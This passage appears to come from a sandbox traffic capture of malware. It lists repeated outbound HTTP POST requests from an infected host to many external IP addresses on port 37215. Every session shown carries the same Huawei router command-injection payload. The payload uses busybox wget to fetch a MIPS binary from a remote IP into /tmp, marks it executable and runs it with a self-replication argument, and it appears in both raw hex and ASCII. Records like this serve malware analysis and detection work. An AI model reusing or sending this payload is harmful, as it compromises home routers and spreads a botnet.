                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.1558938157.207.110.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508290052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.1540130157.231.115.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508291960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          86192.168.2.1553154144.36.14.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508306980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.1547526157.172.192.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.512849092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.1545464157.148.39.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.512873888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.1532844157.85.254.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.520745039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.154029041.71.193.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.520767927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.154824641.29.194.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.520816088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.15406524.50.23.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.520889997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.1559532157.15.145.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.524300098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
